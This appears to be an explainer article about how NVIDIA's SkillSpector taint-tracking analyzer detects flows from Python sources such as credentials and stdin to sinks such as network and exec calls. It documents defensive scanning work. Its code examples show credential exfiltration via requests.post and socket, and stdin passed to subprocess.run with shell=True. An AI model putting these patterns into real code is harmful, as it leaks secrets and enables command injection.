How SkillSpector Taint Tracking Analyzes Data Flows from Sources to Sinks
SkillSpector's taint tracking analyzer examines Python files using AST traversal to mark data from sources (credentials, file reads, network inputs) and trace it through assignments, f-strings, and containers until it reaches dangerous sinks (network writes, exec calls, file writes), emitting findings categorized as TT1–TT5.
NVIDIA's SkillSpector employs a behavioral taint-tracking analyzer to detect security vulnerabilities in Python-based skills. By building an abstract syntax tree (AST) for each .py file and tracking how data moves from sensitive origins to dangerous destinations, the tool identifies potential data leaks and code injection risks. This analysis examines the implementation in behavioral_taint_tracking.py and its supporting modules to map exactly how data flows are detected.
How SkillSpector Defines Sources and Sinks
Source Categories and Detection
The analyzer defines four explicit source groups in behavioral_taint_tracking.py: _CREDENTIAL_SOURCES (e.g., os.getenv), _FILE_READ_SOURCES (e.g., open), _NETWORK_INPUT_SOURCES (e.g., requests.get), and _USER_INPUT_SOURCES (e.g., input). When the AST visitor encounters an assignment statement (ast.Assign), the right-hand side expression is scanned via _find_source_in_expr. If a call matches one of these source sets, the left-hand side variables are marked as tainted through _mark_targets.
Sink Resolution and Dynamic Imports
Sinks are aggregated in the _ALL_SINKS collection, covering network outputs, exec-related functions, and file-write APIs. During traversal, each ast.Call node is resolved to its canonical name via _resolve_sink_name, which also handles dynamic imports such as importlib.import_module(...).run. This resolution ensures that even indirectly invoked sinks are identified for flow analysis.
The Three-Phase Taint Analysis Process
Phase 1: Source Identification and Variable Marking
When processing assignments, the analyzer first checks if the right-hand side contains a direct source call. If no direct source is found, the system invokes _find_tainted_in_expr to propagate taint from previously marked variables. This mechanism enables tracking through chained assignments, allowing patterns like payload = secret or msg = f"{secret}" to remain correctly flagged as tainted throughout the data lifecycle.
Phase 2: Sink Detection and Name Resolution
During the AST walk, the analyzer evaluates every ast.Call node against the _ALL_SINKS definitions. The _resolve_sink_name function normalizes the call to its fully qualified name, accounting for import aliases and dynamic module loading. Matching calls are retained for the final flow-mapping phase.
Phase 3: Mapping Data Flows and Rule Selection
The analyzer distinguishes between two flow types when mapping sources to sinks:
-
Direct flows – The
_find_nested_sourcesfunction searches sink argument trees for source calls that appear inside the sink invocation (e.g.,requests.post(open("token").read())). When found,_pick_ruleselects the most specific rule ID (TT3–TT5) based on the source and sink categories; otherwise, the generic TT1 rule is applied. -
Indirect flows – After propagation,
_find_tainted_names_in_argsexamines sink arguments for references to tainted variables. These flows receive the TT2 classification, indicating that tainted data reached the sink through intermediate variables or containers.
Each discovered flow is emitted as an AnalyzerFinding containing the rule ID, severity, file location, a human-readable message, and the matched code snippet (matched_text). These findings are later transformed into the generic Finding type by static_runner.py for final reporting.
Code Examples of Taint Flow Detection
The following examples demonstrate how SkillSpector classifies different data flow patterns:
Direct Source-to-Sink Flow (TT3)
import os, requests
secret = os.getenv("API_KEY")
requests.post("https://example.com/ingest", data=secret)
The analyzer marks os.getenv as a credential source, identifies requests.post as a network-output sink, and emits a TT3 finding indicating that a credential is sent over the network.
Indirect Flow Through Containers (TT2)
import os, socket
token = os.getenv("TOKEN")
payload = {"auth": token}
socket.socket().sendall(str(payload).encode())
Here, token becomes tainted via the source, _mark_targets records it, and later _find_tainted_names_in_args discovers that payload (a dictionary containing the tainted token) reaches the sendall sink, producing a TT2 finding for indirect flow.
Taint Propagation via F-Strings (TT5)
import sys, subprocess
user_cmd = sys.stdin.read()
cmd = f"ls {user_cmd}"
subprocess.run(cmd, shell=True)
sys.stdin.read is recognized as a user-input source. The f-string propagates the taint through _find_tainted_in_expr, and subprocess.run (an exec sink) triggers a TT5 finding because external input flows into code execution.
Key Implementation Files
Understanding the taint tracking architecture requires familiarity with these specific files in the NVIDIA/SkillSpector repository:
behavioral_taint_tracking.py– Contains the core implementation, including source/sink definitions (_CREDENTIAL_SOURCES,_ALL_SINKS), the AST visitor logic, and thenodeentry point (lines 22–40).common.py– Provides utility helpers for import alias resolution and type-map building used during name resolution.static_runner.py– Integrates the analyzer into the SkillSpector pipeline and handles the conversion fromAnalyzerFindingto the genericFindingtype.state.py– Holds theSkillspectorStatethat supplies file contents viafile_cacheand manages the component list fed to the analyzer.tests/nodes/analyzers/test_behavioral_taint_tracking.py– Verifies source-to-sink detection, reassignment propagation, container handling, and f-string propagation.
Summary
- SkillSpector uses AST-based analysis in
behavioral_taint_tracking.pyto track data from four source categories to sink APIs. - Taint propagates through assignments, f-strings, and containers via
_find_tainted_in_exprand_find_tainted_names_in_args. - Direct flows receive specific rule IDs (TT3–TT5) via
_pick_rule, while indirect flows are classified as TT2. - The
nodemethod orchestrates analysis across all Python files, skipping oversized files and aggregatingAnalyzerFindingresults.
Frequently Asked Questions
What is the entry point for SkillSpector's taint analysis?
The public node method in behavioral_taint_tracking.py serves as the primary entry point. It iterates over every .py component in the skill, skips files that exceed size limits, and aggregates all AnalyzerFinding objects into the final report that is converted to the generic Finding type.
How does SkillSpector handle dynamic imports when detecting sinks?
The analyzer uses _resolve_sink_name to resolve ast.Call nodes to their canonical fully qualified names, including support for dynamic imports like importlib.import_module(...).run. This ensures that sinks invoked through runtime module loading are still correctly identified and analyzed for taint flows.
What distinguishes TT1 findings from TT2 findings in SkillSpector?
TT1 represents a generic or direct source-to-sink flow without specific categorization, while TT2 specifically indicates an indirect flow where tainted data reaches a sink through intermediate variables or containers (e.g., a tainted value stored in a dictionary that is later passed to a network function).
How does taint propagate through string formatting operations?
When processing f-strings or other string concatenations, _find_tainted_in_expr examines the expression components. If any referenced variable is already marked as tainted, the resulting string variable inherits the taint status, allowing the analyzer to detect flows like cmd = f"ls {user_cmd}" before they reach execution sinks.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →